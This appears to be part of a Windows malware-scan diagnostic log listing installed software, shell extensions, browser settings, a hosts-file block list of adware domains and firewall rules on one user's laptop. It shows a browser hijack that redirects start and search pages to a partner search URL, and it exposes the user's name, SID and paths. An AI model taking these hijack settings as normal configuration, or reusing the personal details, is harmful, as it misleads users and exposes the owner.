Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{d491dd9d-2eda-4d75-b504-1a201436e7fd}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 sk) (HKLM\...\Mozilla Firefox 84.0.2 (x64 sk)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 84.0.2.7675 - Mozilla)
Nástroje kontroly pravopisu pro Microsoft Office 2013 – čeština (HKLM\...\{90150000-001F-0405-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2013 - slovenčina (HKLM\...\{90150000-001F-041B-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Opera Stable 74.0.3911.218 (HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Opera 74.0.3911.218) (Version: 74.0.3911.218 - Opera Software)
Peggle Nights (HKLM-x32\...\WTA-e5fc45fd-6c4e-4716-9959-0c24fa0ec3cf) (Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (HKLM-x32\...\WTA-0806cc10-4b86-435a-b2ef-b52a9d176371) (Version: 3.0.2.59 - WildTangent) Hidden
Podpora Apple aplikácií (32-bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)
Podpora Apple aplikácií(64-bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)
Polar Bowler 1st Frame (HKLM-x32\...\WTA-ddecdf91-c902-43c0-b4a2-ad7fa09ee608) (Version: 3.0.2.59 - WildTangent) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.32.508.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7218 - Realtek Semiconductor Corp.)
Search the Web (Yahoo) (HKLM-x32\...\{B3995B59-E319-8AD9-5299-FA59821929D9}) (Version: - ) <==== ATTENTION
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Skype verzia 8.68 (HKLM-x32\...\Skype_is1) (Version: 8.68 - Skype Technologies S.A.)
Spotify (HKLM-x32\...\Spotify) (Version: 0.9.6.81.gd359a796 - Spotify AB)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.4.4445 - TeamViewer)
The Chronicles of Emerland Solitaire (HKLM-x32\...\WTA-3640f990-f95d-4094-8958-724f45b01d45) (Version: 3.0.2.51 - WildTangent) Hidden
Trinklit Supreme (HKLM-x32\...\WTA-4627db5c-4d92-437b-bb88-bb76eb942645) (Version: 2.2.0.98 - WildTangent) Hidden
Update for Skype for Business 2015 (KB4484289) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{1C76EBD9-0A70-4094-A543-00CAA3B62113}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB4484289) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{1C76EBD9-0A70-4094-A543-00CAA3B62113}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB4484289) 64-Bit Edition (HKLM\...\{90150000-012B-041B-1000-0000000FF1CE}_Office15.PROPLUS_{1C76EBD9-0A70-4094-A543-00CAA3B62113}) (Version: - Microsoft)
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.7.4 - Earth Networks, Inc.)
WebAdvisor od McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.194 - McAfee, LLC)
Wondershare Filmora(Build 8.5.1) (HKLM\...\Wondershare Filmora_is1) (Version: - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
Zoom (HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\ZoomUMX) (Version: 5.5.4 (13142.0301) - Zoom Video Communications, Inc.)
Zuma's Revenge (HKLM-x32\...\WTA-e5c311be-040c-4576-bf7d-6fe63f5223a1) (Version: 2.2.0.97 - WildTangent) Hidden

Packages:
=========
- Games App - -> C:\Program Files\WindowsApps\WildTangentGames.-GamesApp-_1.0.3.28_x86__qt5r5pa5dyg8m [2016-11-12] (WildTangent Games)
AccuWeather for Windows 8 -> C:\Program Files\WindowsApps\AccuWeather.AccuWeatherforWindows8_4.1.0.31_x64__8zz2pj9h1h1d8 [2016-11-12] (AccuWeather)
Acer Explorer -> C:\Program Files\WindowsApps\AcerIncorporated.AcerExplorer_2.0.0.3002_neutral__48frkmn4z8aw4 [2016-11-12] (Acer Incorporated)
Booking.com Partner Edition -> C:\Program Files\WindowsApps\4AE8B7C2.Booking.comPartnerEdition_1.2.1.0_x64__6wqyppa9wfhnr [2016-11-09] (Booking.com B.V.)
eBay -> C:\Program Files\WindowsApps\eBayInc.eBay_1.6.0.34_neutral__1618n3s9xq8tw [2016-11-12] (eBay, Inc)
Evernote Touch -> C:\Program Files\WindowsApps\Evernote.Evernote_3.3.0.102_x86__q4d96b2w5wcc2 [2016-11-12] (Evernote)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_1.4.0.9_x64__8xx8rvfyw5nnt [2016-11-09] (Facebook, Inc.)
Flipboard -> C:\Program Files\WindowsApps\Flipboard.Flipboard_2.1.3.0_neutral__3f5azkryzdbc4 [2017-07-24] (Flipboard)
Fresh Paint -> C:\Program Files\WindowsApps\Microsoft.FreshPaint_2.0.15133.0_x86__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation)
Hry -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.139.0_x64__8wekyb3d8bbwe [2014-03-18] (Microsoft Corporation) [MS Ad]
Hudba -> C:\Program Files\WindowsApps\Microsoft.ZuneMusic_2.6.672.0_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
Kindle -> C:\Program Files\WindowsApps\AMZNMobileLLC.KindleforWindows8_2.1.0.2_neutral__stfe6vwa9jnbp [2016-11-12] (AMZN Mobile LLC)
MSN Cestovanie -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.336_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
MSN Financie -> C:\Program Files\WindowsApps\Microsoft.BingFinance_3.0.4.344_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
MSN Jedlá a nápoje -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.336_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
MSN Počasie -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.350_x64__8wekyb3d8bbwe [2016-12-02] (Microsoft Corporation) [MS Ad]
MSN Správy -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.4.344_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
MSN Šport -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.4.345_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
MSN Zdravie a fitnes -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.336_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
RAR Opener -> C:\Program Files\WindowsApps\DeviceDoctor.RAROpener_1.1.0.125_neutral__mkdtfchztkfbm [2017-09-18] (Tiny Opener)
Skype -> C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1016_x86__kzf8qxf38zg5c [2016-11-12] (Skype) [MS Ad]
TuneIn Radio -> C:\Program Files\WindowsApps\TuneIn.TuneInRadio_1.1.0.0_neutral__6bhtb546zcxnj [2014-12-23] (TuneIn)
Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.6.446.0_x64__8wekyb3d8bbwe [2016-11-12] (Microsoft Corporation) [MS Ad]
Videomomentky -> C:\Program Files\WindowsApps\Microsoft.MovieMoments_6.3.9654.20464_x64__8wekyb3d8bbwe [2016-11-09] (Microsoft Corporation)
Zinio -> C:\Program Files\WindowsApps\ZinioLLC.Zinio_2.1.0.317_x64__0q6dqzpp40p2e [2014-12-23] (Zinio LLC)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2055909378-1137603550-79369489-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Alžbeta\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-2055909378-1137603550-79369489-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Alžbeta\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20339.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2055909378-1137603550-79369489-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Alžbeta\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll => No File
ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => -> No File
ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2017-10-02] (Acer Incorporated -> Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2017-10-02] (Acer Incorporated -> Acer Incorporated)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers: [ACloudSyncedRF] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => -> No File
ShellIconOverlayIdentifiers: [ACloudSyncedSF] -> {5D5F18B7-D59B-4B18-A3E9-0A4BDCCCB699} => C:\Program Files (x86)\Acer\Acer Portal\x64\shellext_win.dll -> No File
ShellIconOverlayIdentifiers: [ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2017-10-02] (Acer Incorporated -> Acer Incorporated)
ShellIconOverlayIdentifiers: [ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2017-10-02] (Acer Incorporated -> Acer Incorporated)
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2020-10-29] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers1: [Foxit_ConvertToPDF] -> {C5269811-4A29-4818-A4BB-111F9FC63A5F} => C:\Program Files (x86)\Foxit PhantomPDF\plugins\ConvertToPDFShellExtension_x64.dll [2014-05-14] (Foxit Corporation -> Foxit Corporation)
ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2018-12-03] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2020-10-29] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers3: [ContextMenuShlExt] -> {08264889-8298-4B92-A6F2-6813E1BE356E} => C:\Program Files (x86)\Acer\Acer Portal\x64\shellext_win.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2014-07-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [igfxOSP] -> {FA507C3F-30C6-4DCA-9EE5-2656072EEC14} => C:\Windows\system32\igfxOSP.dll [2014-07-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2020-10-29] (ESET, spol. s r.o. -> ESET)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Public\Desktop\Dropbox.lnk -> C:\Program Files\Dropbox\StartURL.exe () -> hxxps://www.dropbox.com/partners/acer2014/download

==================== Loaded Modules (Whitelisted) =============


==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com/?pc=ACJB
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxps://www.msn.com/en-xl/?pc=UE12&ocid=UE12DHP
SearchScopes: HKLM -> DefaultScope {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_18_49_jny_soverj_00_00&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dhodor%26cd%3D2XzuyEtN2Y1L1QzutB0CyCtDtD0CtAyC0CtDyDzzyE0A0AyBtN0D0TzutN1L2XzuyEtFtAtAtFtDtFtDtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2Szy1T1PyCtD1P1TtDtGtB1RyE1OtGyEtCzzyDtG1TzzyE1RtGtC1S1TyEyEtBzzzytD1Q1OtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1OtDtCyBtD1TtDyDtGyC1Q1QzztGyEtC1OzztG1Tzz1QyEtGtDzzzy1PtCzy1PtB1O1RzyyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutN1Q2Z1B1P1Rzu%26cr%3D550114320%26a%3Dhdr_s_18_49_jny_soverj_00_00%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL =
SearchScopes: HKU\.DEFAULT -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKU\S-1-5-21-2055909378-1137603550-79369489-1001 -> DefaultScope {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL =
SearchScopes: HKU\S-1-5-21-2055909378-1137603550-79369489-1001 -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKU\S-1-5-21-2055909378-1137603550-79369489-1001 -> {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2020-04-15] (Microsoft Corporation -> Microsoft Corporation)
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-02-07] (McAfee, LLC -> McAfee, LLC)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2018-05-15] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2020-04-15] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2021-02-07] (McAfee, LLC -> McAfee, LLC)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2018-05-15] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2018-02-15] (Microsoft Corporation -> Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll No File
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2021-03-30 11:41 - 000004666 _____ C:\Windows\system32\drivers\etc\hosts
0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 api.recommendedsw.com
0.0.0.0 rp.yefeneri2.com
0.0.0.0 os.yefeneri2.com
0.0.0.0 os2.yefeneri2.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Acer\abFiles\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Alžbeta\Desktop\IMG_1125 (1).JPG
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\StartupApproved\Run: => "WeatherBug"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\StartupApproved\Run: => "Opera Browser Assistant"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\StartupApproved\Run: => "Skype for Desktop"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{7F8D0D0A-A8F7-48EA-9382-E5808D67830F}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{9208E5BE-4E2A-4964-868A-FBA7DFB271BD}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe => No File
FirewallRules: [{1B9F76F8-C3BF-42AC-8AE0-8152A90FD52B}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{BB347DDE-11EE-4C1A-8B48-BC387967BB21}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{44374C75-D82B-4817-BA1D-27B5DE94C833}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{A43D7B79-FC28-4F05-A966-677F04AAE568}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe (Spotify AB -> Spotify Ltd)
